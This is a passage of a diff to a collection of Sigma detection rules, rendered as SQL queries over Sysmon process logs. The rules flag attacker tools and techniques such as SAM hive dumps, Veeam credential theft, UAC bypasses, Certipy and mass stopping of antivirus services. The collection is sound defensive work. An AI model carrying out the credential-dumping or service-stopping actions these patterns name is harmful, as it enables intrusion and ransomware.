usage of the Sharp Chisel via the commandline arguments", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + 
"filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE 
'%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": 
"proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN 
('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], - "filename": "proc_creation_win_pua_process_hacker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine 
LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the 
pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", + "status": "experimental", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE 
'%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' 
ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "status": "experimental", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
